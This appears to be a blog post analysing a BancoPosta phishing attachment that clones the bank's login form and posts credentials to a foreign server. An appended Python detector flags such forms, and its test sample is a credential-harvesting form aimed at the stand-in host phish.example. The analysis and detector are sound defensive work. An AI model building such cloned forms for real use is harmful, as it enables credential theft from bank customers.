[SPAM] Banco Posta online – Italy

Often the spam folder of my Gmail account is very interesting. I’m not a BancoPosta customer, but I receive 2/3 emails per week where someone notifies me that my bank account will be locked unless I provide my credentials in the attached form.


The attached form is nothing more and nothing less than an HTML file that clones the real web page form. The fake has the same JavaScript code in the head and points its external JavaScript and CSS files to the real resources on https://bancopostaonline.poste.it.

Of course, looking into the form, the POST action turns out to be the real danger.


All POST data will be sent to an unknown server located in China.

When the URL is visited (sending fake data) via a POST or GET request, the page forwards the client to poste.it with no referer.
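
The mismatch described above (scripts and CSS loaded from the real site, form posting somewhere else) can be checked automatically when triaging an HTML attachment. The following is an added example, not code from the original post; the sample attachment, its resource paths and the host `phish.example` are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; paths and phish.example are placeholders.
SAMPLE = """<html><head>
<script src="https://bancopostaonline.poste.it/js/login.js"></script>
<link rel="stylesheet" href="https://bancopostaonline.poste.it/css/style.css">
</head><body>
<form method="post" action="http://phish.example/collect.php">
<input name="username"><input type="password" name="password">
</form></body></html>"""

class FormAudit(HTMLParser):
    """Collect the hosts of external resources and every form action."""
    def __init__(self):
        super().__init__()
        self.resource_hosts = set()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self._add_resource(a["src"])
        elif tag == "link" and a.get("href"):
            self._add_resource(a["href"])
        elif tag == "form":
            self.actions.append(a.get("action") or "")

    def _add_resource(self, url):
        host = urlparse(url).hostname
        if host:
            self.resource_hosts.add(host.lower())

def suspicious_actions(html):
    """Return (action, host) for forms posting to a host the page loads nothing from."""
    audit = FormAudit()
    audit.feed(html)
    flagged = []
    for action in audit.actions:
        host = (urlparse(action).hostname or "").lower()
        if host and host not in audit.resource_hosts:
            flagged.append((action, host))
    return flagged

if __name__ == "__main__":
    for action, host in suspicious_actions(SAMPLE):
        print(f"form posts to {host}: {action}")
```

A form with a relative or empty action is not flagged, since an attachment opened from disk has no origin to post back to; only absolute actions pointing at a host outside the page's own resource hosts are reported.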